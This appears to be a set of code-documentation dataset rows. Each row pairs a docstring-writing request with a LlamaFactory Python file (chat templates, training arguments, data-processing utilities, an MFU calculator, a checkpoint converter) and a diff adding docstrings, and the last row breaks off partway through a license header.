format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
default_system=(
"You are an AI assistant named Sailor created by Sea AI Lab. "
"Your answer should be friendly, unbiased, faithful, informative and detailed."
),
stop_words=["<|im_end|>"],
)
register_template(
name="seed_coder",
format_user=StringFormatter(
slots=[{"bos_token"}, "user\n{{content}}", {"eos_token"}, {"bos_token"}, "assistant\n"]
),
format_system=StringFormatter(slots=[{"bos_token"}, "system\n{{content}}", {"eos_token"}]),
default_system=(
"You are an AI programming assistant, utilizing the Seed-Coder model, developed by ByteDance Seed, "
"and you only answer questions related to computer science. For politically sensitive questions, "
"security and privacy issues, and other non-computer science questions, you will refuse to answer.\n\n"
),
)
# copied from seed_coder
register_template(
name="seed_oss",
format_user=StringFormatter(
slots=[{"bos_token"}, "user\n{{content}}", {"eos_token"}, {"bos_token"}, "assistant\n"]
),
format_system=StringFormatter(slots=[{"bos_token"}, "system\n{{content}}", {"eos_token"}]),
format_function=FunctionFormatter(slots=[{"bos_token"}, "\n{{content}}", {"eos_token"}], tool_format="seed_oss"),
format_tools=ToolFormatter(tool_format="seed_oss"),
template_class=ReasoningTemplate,
thought_words=("<seed:think>", "</seed:think>"),
)
register_template(
name="smollm",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
)
register_template(
name="smollm2",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
default_system="You are a helpful AI assistant named SmolLM, trained by Hugging Face.",
)
register_template(
name="solar",
format_user=StringFormatter(slots=["### User:\n{{content}}\n\n### Assistant:\n"]),
format_system=StringFormatter(slots=["### System:\n{{content}}\n\n"]),
efficient_eos=True,
)
register_template(
name="starchat",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|end|>\n<|assistant|>"]),
format_assistant=StringFormatter(slots=["{{content}}<|end|>\n"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}<|end|>\n"]),
stop_words=["<|end|>"],
)
register_template(
name="telechat2",
format_user=StringFormatter(slots=["<_user>{{content}}<_bot>"]),
format_system=StringFormatter(slots=["<_system>{{content}}"]),
default_system=(
"你是中国电信星辰语义大模型,英文名是TeleChat,你是由中电信人工智能科技有限公司和中国电信人工智能研究院(TeleAI)研发的人工智能助手。"
),
)
register_template(
name="vicuna",
format_user=StringFormatter(slots=["USER: {{content}} ASSISTANT:"]),
default_system=(
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions."
),
replace_jinja_template=True,
)
register_template(
name="video_llava",
format_user=StringFormatter(slots=["USER: {{content}} ASSISTANT:"]),
default_system=(
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions."
),
mm_plugin=get_mm_plugin(name="video_llava", image_token="<image>", video_token="<video>"),
)
register_template(
name="xuanyuan",
format_user=StringFormatter(slots=["Human: {{content}} Assistant:"]),
default_system=(
"以下是用户和人工智能助手之间的对话。用户以Human开头,人工智能助手以Assistant开头,"
"会对人类提出的问题给出有帮助、高质量、详细和礼貌的回答,并且总是拒绝参与与不道德、"
"不安全、有争议、政治敏感等相关的话题、问题和指示。\n"
),
)
# copied from chatml template
register_template(
name="yi",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
)
register_template(
name="yi_vl",
format_user=StringFormatter(slots=["### Human: {{content}}\n### Assistant:"]),
format_assistant=StringFormatter(slots=["{{content}}\n"]),
default_system=(
"This is a chat between an inquisitive human and an AI assistant. "
"Assume the role of the AI assistant. Read all the images carefully, "
"and respond to the human's questions with informative, helpful, detailed and polite answers. "
"这是一个好奇的人类和一个人工智能助手之间的对话。假设你扮演这个AI助手的角色。"
"仔细阅读所有的图像,并对人类的问题做出信息丰富、有帮助、详细的和礼貌的回答。\n\n"
),
stop_words=["###"],
efficient_eos=True,
mm_plugin=get_mm_plugin(name="llava", image_token="<image>"),
)
register_template(
name="youtu",
format_user=StringFormatter(slots=["<|User|>{{content}}<|Assistant|>"]),
format_assistant=StringFormatter(slots=["{{content}}<|end_of_text|>"]),
format_system=StringFormatter(slots=["{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="default"),
format_observation=StringFormatter(slots=["<tool_response>\n{{content}}\n</tool_response><|Assistant|>"]),
format_tools=ToolFormatter(tool_format="default"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|end_of_text|>"],
replace_eos=True,
template_class=ReasoningTemplate,
)
register_template(
name="youtu_vl",
format_user=StringFormatter(
slots=["<|begin_of_text|>user\n{{content}}<|end_of_text|>\n<|begin_of_text|>assistant\n"]
),
format_assistant=StringFormatter(slots=["{{content}}<|end_of_text|>\n"]),
format_system=StringFormatter(slots=["<|begin_of_text|>system\n{{content}}<|end_of_text|>\n"]),
default_system="You are a helpful assistant.",
stop_words=["<|end_of_text|>"],
mm_plugin=get_mm_plugin(name="youtu_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
)
register_template(
name="yuan",
format_user=StringFormatter(slots=["{{content}}", {"token": "<sep>"}]),
format_assistant=StringFormatter(slots=["{{content}}<eod>\n"]),
stop_words=["<eod>"],
)
register_template(
name="zephyr",
format_user=StringFormatter(slots=["<|user|>\n{{content}}", {"eos_token"}, "<|assistant|>\n"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}", {"eos_token"}]),
default_system="You are Zephyr, a helpful assistant.",
)
# copied from glm4_7 template
register_template(
name="aeva",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
format_assistant=StringFormatter(slots=["\n{{content}}"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4_moe"),
format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
format_tools=ToolFormatter(tool_format="glm4_moe"),
format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
default_system=(
"You are an AI assistant named Aeva created by Zongzhi Lou. "
"Your answer should be friendly, unbiased, faithful, informative and detailed."
),
stop_words=["<|user|>", "<|observation|>"],
thought_words=("<think>", "</think>"),
efficient_eos=True,
template_class=Glm47ReasoningTemplate,
) | --- +++ @@ -63,6 +63,7 @@ system: Optional[str] = None,
tools: Optional[str] = None,
) -> tuple[list[int], list[int]]:
+ r"""Return a single pair of token ids representing prompt and response respectively."""
encoded_messages = self._encode(tokenizer, messages, system, tools)
prompt_ids = []
for encoded_ids in encoded_messages[:-1]:
@@ -78,13 +79,16 @@ system: Optional[str] = None,
tools: Optional[str] = None,
) -> list[tuple[list[int], list[int]]]:
+ r"""Return multiple pairs of token ids representing prompts and responses respectively."""
encoded_messages = self._encode(tokenizer, messages, system, tools)
return [(encoded_messages[i], encoded_messages[i + 1]) for i in range(0, len(encoded_messages), 2)]
def extract_tool(self, content: str) -> Union[str, list["FunctionCall"]]:
+ r"""Extract tool message."""
return self.format_tools.extract(content)
def get_stop_token_ids(self, tokenizer: "PreTrainedTokenizer") -> list[int]:
+ r"""Return stop token ids."""
stop_token_ids = {tokenizer.eos_token_id}
for token in self.stop_words:
stop_token_ids.add(tokenizer.convert_tokens_to_ids(token))
@@ -92,16 +96,20 @@ return list(stop_token_ids)
def add_thought(self, content: str = "") -> str:
+ r"""Add empty thought to assistant message."""
return f"{self.thought_words[0]}{self.thought_words[1]}" + content
def remove_thought(self, content: str) -> str:
+ r"""Remove thought from assistant message."""
pattern = re.compile(f"{re.escape(self.thought_words[0])}(.*?){re.escape(self.thought_words[1])}", re.DOTALL)
return re.sub(pattern, "", content).lstrip("\n")
def get_thought_word_ids(self, tokenizer: "PreTrainedTokenizer") -> list[int]:
+ r"""Get the token ids of thought words."""
return tokenizer.encode(self.add_thought(), add_special_tokens=False)
def _convert_elements_to_ids(self, tokenizer: "PreTrainedTokenizer", elements: "SLOTS") -> list[int]:
+ r"""Convert elements to token ids."""
token_ids = []
for elem in elements:
if isinstance(elem, str):
@@ -126,6 +134,11 @@ system: Optional[str],
tools: Optional[str],
) -> list[list[int]]:
+ r"""Encode formatted inputs to pairs of token ids.
+
+ Turn 0: prefix + system + query resp
+ Turn t: query resp.
+ """
system = system or self.default_system
encoded_messages = []
for i, message in enumerate(messages):
@@ -156,6 +169,7 @@
@staticmethod
def _add_or_replace_eos_token(tokenizer: "PreTrainedTokenizer", eos_token: str) -> None:
+ r"""Add or replace eos token to the tokenizer."""
if tokenizer.eos_token == eos_token:
return
@@ -171,6 +185,7 @@ logger.warning_rank0("New tokens have been added, make sure `resize_vocab` is True.")
def fix_special_tokens(self, tokenizer: "PreTrainedTokenizer") -> None:
+ r"""Add eos token and pad token to the tokenizer."""
stop_words = self.stop_words
if self.replace_eos:
if not stop_words:
@@ -199,10 +214,12 @@
@staticmethod
def _jinja_escape(content: str) -> str:
+ r"""Escape single quotes in content."""
return content.replace("'", r"\'")
@staticmethod
def _convert_slots_to_jinja(slots: "SLOTS", tokenizer: "PreTrainedTokenizer", placeholder: str = "content") -> str:
+ r"""Convert slots to jinja template."""
slot_items = []
for slot in slots:
if isinstance(slot, str):
@@ -224,6 +241,7 @@ return " + ".join(slot_items)
def _get_jinja_template(self, tokenizer: "PreTrainedTokenizer") -> str:
+ r"""Return the jinja template."""
prefix = self._convert_slots_to_jinja(self.format_prefix.apply(), tokenizer)
system = self._convert_slots_to_jinja(self.format_system.apply(), tokenizer, placeholder="system_message")
user = self._convert_slots_to_jinja(self.format_user.apply(), tokenizer)
@@ -251,6 +269,7 @@ return jinja_template
def fix_jinja_template(self, tokenizer: "PreTrainedTokenizer") -> None:
+ r"""Replace the jinja template in the tokenizer."""
if tokenizer.chat_template is None or self.replace_jinja_template:
try:
tokenizer.chat_template = self._get_jinja_template(tokenizer)
@@ -261,6 +280,7 @@ def _convert_slots_to_ollama(
slots: "SLOTS", tokenizer: "PreTrainedTokenizer", placeholder: str = "content"
) -> str:
+ r"""Convert slots to ollama template."""
slot_items = []
for slot in slots:
if isinstance(slot, str):
@@ -282,6 +302,7 @@ return "".join(slot_items)
def _get_ollama_template(self, tokenizer: "PreTrainedTokenizer") -> str:
+ r"""Return the ollama template."""
prefix = self._convert_slots_to_ollama(self.format_prefix.apply(), tokenizer)
system = self._convert_slots_to_ollama(self.format_system.apply(), tokenizer, placeholder=".System")
user = self._convert_slots_to_ollama(self.format_user.apply(), tokenizer, placeholder=".Content")
@@ -293,6 +314,10 @@ )
def get_ollama_modelfile(self, tokenizer: "PreTrainedTokenizer") -> str:
+ r"""Return the ollama modelfile.
+
+ TODO: support function calling.
+ """
modelfile = "# ollama modelfile auto-generated by llamafactory\n\n"
modelfile += f'FROM .\n\nTEMPLATE """{self._get_ollama_template(tokenizer)}"""\n\n'
@@ -308,6 +333,7 @@
@dataclass
class Llama2Template(Template):
+ r"""A template that fuse the system message to first user message."""
@override
def _encode(
@@ -377,6 +403,7 @@
@dataclass
class ReasoningTemplate(Template):
+ r"""A template that add thought to assistant message."""
@override
def encode_oneturn(
@@ -434,6 +461,7 @@
@dataclass
class Glm47ReasoningTemplate(ReasoningTemplate):
+ r"""GLM-4.7 uses only the closing </think> tag for empty thinking blocks."""
@override
def add_thought(self, content: str = "") -> str:
@@ -466,6 +494,26 @@ mm_plugin: "BasePlugin" = get_mm_plugin(name="base"),
template_class: type["Template"] = Template,
) -> None:
+ r"""Register a chat template.
+
+ To add the following chat template:
+ ```
+ <s><user>user prompt here
+ <model>model response here</s>
+ <user>user prompt here
+ <model>model response here</s>
+ ```
+
+ The corresponding code should be:
+ ```
+ register_template(
+ name="custom",
+ format_user=StringFormatter(slots=["<user>{{content}}\n<model>"]),
+ format_assistant=StringFormatter(slots=["{{content}}</s>\n"]),
+ format_prefix=EmptyFormatter("<s>"),
+ )
+ ```
+ """
if name in TEMPLATES:
raise ValueError(f"Template {name} already exists.")
@@ -500,6 +548,7 @@
def parse_template(tokenizer: "PreTrainedTokenizer") -> "Template":
+ r"""Extract a chat template from the tokenizer."""
def find_diff(short_str: str, long_str: str) -> str:
i, j = 0, 0
@@ -561,6 +610,7 @@
def get_template_and_fix_tokenizer(tokenizer: "PreTrainedTokenizer", data_args: "DataArguments") -> "Template":
+ r"""Get chat template and fixes the tokenizer."""
if data_args.template is None:
if isinstance(tokenizer.chat_template, str):
logger.warning_rank0("`template` was not specified, try parsing the chat template from the tokenizer.")
@@ -2221,4 +2271,4 @@ thought_words=("<think>", "</think>"),
efficient_eos=True,
template_class=Glm47ReasoningTemplate,
-)+)
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/data/template.py |
Write docstrings for this repository | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from dataclasses import dataclass, field
from transformers import Seq2SeqTrainingArguments
from transformers.training_args import _convert_str_dict
from ..extras.misc import is_env_enabled, use_ray
from ..extras.packages import is_mcore_adapter_available
if is_env_enabled("USE_MCA"):
if not is_mcore_adapter_available():
raise ImportError(
"mcore_adapter is required when USE_MCA=1. Please install `mcore_adapter` and its dependencies."
)
from mcore_adapter import Seq2SeqTrainingArguments as McaSeq2SeqTrainingArguments
BaseTrainingArguments = McaSeq2SeqTrainingArguments
else:
BaseTrainingArguments = Seq2SeqTrainingArguments
@dataclass
class RayArguments:
ray_num_workers: int = field(
default=1,
metadata={"help": "The number of workers for Ray training. Default is 1 worker."},
)
ray_init_kwargs: dict | str | None = field(
default=None,
metadata={"help": "The arguments to pass to ray.init for Ray training. Default is None."},
)
master_addr: str | None = field(
default=None,
metadata={"help": "The master address for init_process_group"},
)
master_port: str | None = field(
default=None,
metadata={"help": "The master port for init_process_group"},
)
def __post_init__(self):
self.use_ray = use_ray()
if isinstance(self.ray_init_kwargs, str) and self.ray_init_kwargs.startswith("{"):
self.ray_init_kwargs = _convert_str_dict(json.loads(self.ray_init_kwargs))
@dataclass
class Fp8Arguments:
fp8: bool = field(
default=False,
metadata={
"help": "Enable FP8 mixed precision training via HuggingFace Accelerate. "
"Requires PyTorch 2.7+ and Hopper architecture GPUs."
},
)
fp8_backend: str = field(
default="auto",
metadata={
"help": "FP8 backend to use ('auto', 'torchao', 'te', 'msamp'). 'auto' selects best available backend."
},
)
fp8_enable_fsdp_float8_all_gather: bool = field(
default=False,
metadata={"help": "Enable FP8 optimizations for FSDP2 all-gather operations."},
)
@dataclass
class TrainingArguments(Fp8Arguments, RayArguments, BaseTrainingArguments):
overwrite_output_dir: bool = field(
default=False,
metadata={"help": "deprecated"},
)
def __post_init__(self):
RayArguments.__post_init__(self)
BaseTrainingArguments.__post_init__(self) | --- +++ @@ -37,6 +37,7 @@
@dataclass
class RayArguments:
+ r"""Arguments pertaining to the Ray training."""
ray_num_workers: int = field(
default=1,
@@ -64,6 +65,7 @@
@dataclass
class Fp8Arguments:
+ r"""Arguments pertaining to the FP8 training."""
fp8: bool = field(
default=False,
@@ -86,6 +88,7 @@
@dataclass
class TrainingArguments(Fp8Arguments, RayArguments, BaseTrainingArguments):
+ r"""Arguments pertaining to the trainer."""
overwrite_output_dir: bool = field(
default=False,
@@ -94,4 +97,4 @@
def __post_init__(self):
RayArguments.__post_init__(self)
- BaseTrainingArguments.__post_init__(self)+ BaseTrainingArguments.__post_init__(self)
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/hparams/training_args.py |
Can you add docstrings to this Python file? | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import bisect
from abc import ABC, abstractmethod
from dataclasses import dataclass
from typing import TYPE_CHECKING, Any, Optional
if TYPE_CHECKING:
from transformers import PreTrainedTokenizer, ProcessorMixin
from ...hparams import DataArguments
from ..template import Template
@dataclass
class DatasetProcessor(ABC):
template: "Template"
tokenizer: "PreTrainedTokenizer"
processor: Optional["ProcessorMixin"]
data_args: "DataArguments"
@abstractmethod
def preprocess_dataset(self, examples: dict[str, list[Any]]) -> dict[str, list[Any]]:
...
@abstractmethod
def print_data_example(self, example: dict[str, list[int]]) -> None:
...
def search_for_fit(numbers: list[int], capacity: int) -> int:
index = bisect.bisect(numbers, capacity)
return -1 if index == 0 else (index - 1)
def greedy_knapsack(numbers: list[int], capacity: int) -> list[list[int]]:
numbers.sort() # sort numbers in ascending order for binary search
knapsacks = []
while numbers:
current_knapsack = []
remaining_capacity = capacity
while True:
index = search_for_fit(numbers, remaining_capacity)
if index == -1:
break # no more numbers fit in this knapsack
remaining_capacity -= numbers[index] # update the remaining capacity
current_knapsack.append(numbers.pop(index)) # add the number to knapsack
knapsacks.append(current_knapsack)
return knapsacks
def infer_seqlen(source_len: int, target_len: int, cutoff_len: int) -> tuple[int, int]:
if target_len * 2 < cutoff_len: # truncate source
max_target_len = cutoff_len
elif source_len * 2 < cutoff_len: # truncate target
max_target_len = cutoff_len - source_len
else: # truncate both
max_target_len = int(cutoff_len * (target_len / (source_len + target_len)))
new_target_len = min(max_target_len, target_len)
max_source_len = max(cutoff_len - new_target_len, 0)
new_source_len = min(max_source_len, source_len)
return new_source_len, new_target_len | --- +++ @@ -27,6 +27,7 @@
@dataclass
class DatasetProcessor(ABC):
+ r"""A class for data processors."""
template: "Template"
tokenizer: "PreTrainedTokenizer"
@@ -35,19 +36,23 @@
@abstractmethod
def preprocess_dataset(self, examples: dict[str, list[Any]]) -> dict[str, list[Any]]:
+ r"""Build model inputs from the examples."""
...
@abstractmethod
def print_data_example(self, example: dict[str, list[int]]) -> None:
+ r"""Print a data example to stdout."""
...
def search_for_fit(numbers: list[int], capacity: int) -> int:
+ r"""Find the index of largest number that fits into the knapsack with the given capacity."""
index = bisect.bisect(numbers, capacity)
return -1 if index == 0 else (index - 1)
def greedy_knapsack(numbers: list[int], capacity: int) -> list[list[int]]:
+ r"""Implement efficient greedy algorithm with binary search for the knapsack problem."""
numbers.sort() # sort numbers in ascending order for binary search
knapsacks = []
@@ -69,6 +74,7 @@
def infer_seqlen(source_len: int, target_len: int, cutoff_len: int) -> tuple[int, int]:
+ r"""Compute the real sequence length after truncation by the cutoff_len."""
if target_len * 2 < cutoff_len: # truncate source
max_target_len = cutoff_len
elif source_len * 2 < cutoff_len: # truncate target
@@ -79,4 +85,4 @@ new_target_len = min(max_target_len, target_len)
max_source_len = max(cutoff_len - new_target_len, 0)
new_source_len = min(max_source_len, source_len)
- return new_source_len, new_target_len+ return new_source_len, new_target_len
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/data/processor/processor_utils.py |
Generate docstrings for each module | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import fire
import torch
import torch.distributed as dist
from transformers import AutoConfig
from llamafactory.train.tuner import run_exp
BASE = 2 # gemm (add + mul)
def compute_model_flops(
model_name_or_path: str,
total_batch_size: int,
seq_length: int,
include_backward: bool = True,
include_recompute: bool = False,
include_flashattn: bool = False,
) -> int:
config = AutoConfig.from_pretrained(model_name_or_path)
hidden_size = getattr(config, "hidden_size", None)
vocab_size = getattr(config, "vocab_size", None)
intermediate_size = getattr(config, "intermediate_size", None)
num_attention_heads = getattr(config, "num_attention_heads", None)
num_key_value_heads = getattr(config, "num_key_value_heads", None)
num_hidden_layers = getattr(config, "num_hidden_layers", None)
tie_word_embeddings = getattr(config, "tie_word_embeddings", False)
# mlp module
mlp_flops_per_token = 3 * BASE * hidden_size * intermediate_size # up, gate, down
mlp_flops = total_batch_size * seq_length * num_hidden_layers * mlp_flops_per_token
# attn projector module
q_flops_per_token = BASE * hidden_size * hidden_size
o_flops_per_token = BASE * hidden_size * hidden_size
k_flops_per_token = BASE * hidden_size * hidden_size * num_key_value_heads // num_attention_heads
v_flops_per_token = BASE * hidden_size * hidden_size * num_key_value_heads // num_attention_heads
attn_proj_flops_per_token = q_flops_per_token + o_flops_per_token + k_flops_per_token + v_flops_per_token
attn_proj_flops = total_batch_size * seq_length * num_hidden_layers * attn_proj_flops_per_token
# attn sdpa module
sdpa_flops_per_layer = 2 * BASE * hidden_size * seq_length * seq_length # (q * k^T) * v
sdpa_flops = total_batch_size * num_hidden_layers * sdpa_flops_per_layer
# embedding module
embedding_flops_per_token = hidden_size * vocab_size
embedding_flops = total_batch_size * seq_length * embedding_flops_per_token
if tie_word_embeddings is False:
embedding_flops *= 2
non_embedding_flops = mlp_flops + attn_proj_flops + sdpa_flops
non_embedding_coeff, embedding_coeff = 1, 1
if include_backward:
non_embedding_coeff += 2
embedding_coeff += 2
if include_recompute:
non_embedding_coeff += 1
total_flops = non_embedding_coeff * non_embedding_flops + embedding_coeff * embedding_flops
if include_flashattn:
total_flops += sdpa_flops
return total_flops
def compute_device_flops(world_size: int) -> float:
device_name = torch.cuda.get_device_name()
if "H100" in device_name or "H800" in device_name:
return 989 * 1e12 * world_size
elif "A100" in device_name or "A800" in device_name:
return 312 * 1e12 * world_size
elif "V100" in device_name:
return 125 * 1e12 * world_size
elif "4090" in device_name:
return 98 * 1e12 * world_size
else:
raise NotImplementedError(f"Device not supported: {device_name}.")
def calculate_mfu(
model_name_or_path: str,
batch_size: int = 1,
seq_length: int = 1024,
num_steps: int = 100,
finetuning_type: str = "lora",
flash_attn: str = "auto",
deepspeed_stage: int = 0,
disable_gc: bool = False,
liger_kernel: bool = False,
unsloth_gc: bool = False,
) -> float:
args = {
"model_name_or_path": model_name_or_path,
"flash_attn": flash_attn,
"disable_gradient_checkpointing": disable_gc,
"enable_liger_kernel": liger_kernel,
"use_unsloth_gc": unsloth_gc,
"stage": "pt",
"do_train": True,
"finetuning_type": finetuning_type,
"dataset": "c4_demo",
"cutoff_len": seq_length,
"output_dir": os.path.join("saves", "test_mfu"),
"logging_strategy": "no",
"save_strategy": "no",
"save_only_model": True,
"overwrite_output_dir": True,
"per_device_train_batch_size": batch_size,
"max_steps": num_steps,
"bf16": True,
}
if deepspeed_stage in [2, 3]:
args["deepspeed"] = f"examples/deepspeed/ds_z{deepspeed_stage}_config.json"
run_exp(args)
if dist.is_initialized():
dist.barrier()
world_size = dist.get_world_size()
else:
world_size = 1
if int(os.getenv("LOCAL_RANK", "0")) == 0:
with open(os.path.join("saves", "test_mfu", "all_results.json"), encoding="utf-8") as f:
result = json.load(f)
total_batch_size = batch_size * world_size
mfu_value = (
result["train_steps_per_second"]
* compute_model_flops(model_name_or_path, total_batch_size, seq_length)
/ compute_device_flops(world_size)
)
print(f"MFU: {mfu_value * 100:.2f}%")
if __name__ == "__main__":
fire.Fire(calculate_mfu) | --- +++ @@ -34,6 +34,7 @@ include_recompute: bool = False,
include_flashattn: bool = False,
) -> int:
+ r"""Calculate the FLOPs of model per forward/backward pass."""
config = AutoConfig.from_pretrained(model_name_or_path)
hidden_size = getattr(config, "hidden_size", None)
vocab_size = getattr(config, "vocab_size", None)
@@ -83,6 +84,7 @@
def compute_device_flops(world_size: int) -> float:
+ r"""Calculate the FLOPs of the device capability per second."""
device_name = torch.cuda.get_device_name()
if "H100" in device_name or "H800" in device_name:
return 989 * 1e12 * world_size
@@ -108,6 +110,10 @@ liger_kernel: bool = False,
unsloth_gc: bool = False,
) -> float:
+ r"""Calculate MFU for given model and hyper-params.
+
+ Usage: python cal_mfu.py --model_name_or_path path_to_model --batch_size 1 --seq_length 1024
+ """
args = {
"model_name_or_path": model_name_or_path,
"flash_attn": flash_attn,
@@ -152,4 +158,4 @@
if __name__ == "__main__":
- fire.Fire(calculate_mfu)+ fire.Fire(calculate_mfu)
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/scripts/stat_utils/cal_mfu.py |
Add docstrings including usage examples | # Copyright 2025 the ROLL team and the LlamaFactory team.
#
# This code is modified from the ROLL library.
# https://github.com/alibaba/ROLL/blob/main/mcore_adapter/tools/convert.py
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import fire
import torch
from mcore_adapter.models.converter.post_converter import convert_checkpoint_to_hf, convert_checkpoint_to_mca
from mcore_adapter.training_args import DistributingParallelArguments
from mcore_adapter.utils import get_logger
from transformers import AutoConfig
logger = get_logger(__name__)
def convert_mca_to_hf(
checkpoint_path: str,
output_path: str = "./output",
bf16: bool = False,
fp16: bool = False,
convert_model_max_length: int | None = None,
):
if bf16 and fp16:
raise ValueError("bf16 and fp16 cannot be both True.")
torch_dtype = None
if bf16:
torch_dtype = torch.bfloat16
elif fp16:
torch_dtype = torch.float16
convert_checkpoint_to_hf(checkpoint_path, output_path, torch_dtype=torch_dtype)
if convert_model_max_length is not None:
config = AutoConfig.from_pretrained(output_path, trust_remote_code=True)
config.model_max_length = convert_model_max_length
config.save_pretrained(output_path)
def convert(
checkpoint_path: str,
output_path: str = "./output",
bf16: bool = False,
fp16: bool = False,
convert_model_max_length: int | None = None,
tensor_model_parallel_size: int = 1,
pipeline_model_parallel_size: int = 1,
expert_model_parallel_size: int = 1,
virtual_pipeline_model_parallel_size: int | None = None,
moe_grouped_gemm: bool | None = None,
):
if bf16 and fp16:
raise ValueError("bf16 and fp16 cannot be both True.")
mca_config_path = os.path.join(checkpoint_path, "mca_config.json")
from_mca = os.path.exists(mca_config_path)
if not from_mca:
dist_args = DistributingParallelArguments(
tensor_model_parallel_size=tensor_model_parallel_size,
pipeline_model_parallel_size=pipeline_model_parallel_size,
expert_model_parallel_size=expert_model_parallel_size,
virtual_pipeline_model_parallel_size=virtual_pipeline_model_parallel_size,
moe_grouped_gemm=moe_grouped_gemm,
transformer_impl="transformer_engine", # hard code here since we default using te for training
)
convert_checkpoint_to_mca(
checkpoint_path,
output_path,
dist_args,
bf16=bf16,
fp16=fp16,
)
else:
convert_mca_to_hf(
checkpoint_path=checkpoint_path,
output_path=output_path,
bf16=bf16,
fp16=fp16,
convert_model_max_length=convert_model_max_length,
)
def main():
fire.Fire(convert)
if __name__ == "__main__":
main() | --- +++ @@ -35,6 +35,15 @@ fp16: bool = False,
convert_model_max_length: int | None = None,
):
+ """Convert megatron checkpoint to HuggingFace format.
+
+ Args:
+ checkpoint_path: Path to the checkpoint to convert
+ output_path: Path to save the converted checkpoint
+ bf16: Use bfloat16 precision
+ fp16: Use float16 precision
+ convert_model_max_length: Change the model_max_length in hf config.json
+ """
if bf16 and fp16:
raise ValueError("bf16 and fp16 cannot be both True.")
@@ -64,6 +73,23 @@ virtual_pipeline_model_parallel_size: int | None = None,
moe_grouped_gemm: bool | None = None,
):
+ """Convert checkpoint between MCA and HuggingFace formats.
+
+ Args:
+ checkpoint_path: Path to the checkpoint to convert
+ output_path: Path to save the converted checkpoint
+ bf16: Use bfloat16 precision
+ fp16: Use float16 precision
+ convert_model_max_length: Change the model_max_length in hf config.json
+ tensor_model_parallel_size: Tensor model parallel size
+ pipeline_model_parallel_size: Pipeline model parallel size
+ expert_model_parallel_size: Expert model parallel size
+ virtual_pipeline_model_parallel_size: Virtual pipeline model parallel size
+ moe_grouped_gemm: Use grouped gemm for MoE experts. When enabled, expert
+ weights are stored in a flattened format (linear_fc1.weight0, weight1, ...)
+ rather than per-expert format (local_experts.0.linear_fc1.weight, ...).
+ Must match the format used when saving the checkpoint.
+ """
if bf16 and fp16:
raise ValueError("bf16 and fp16 cannot be both True.")
@@ -101,4 +127,4 @@
if __name__ == "__main__":
- main()+ main()
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/scripts/megatron_merge.py |
Add detailed docstrings explaining each function | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
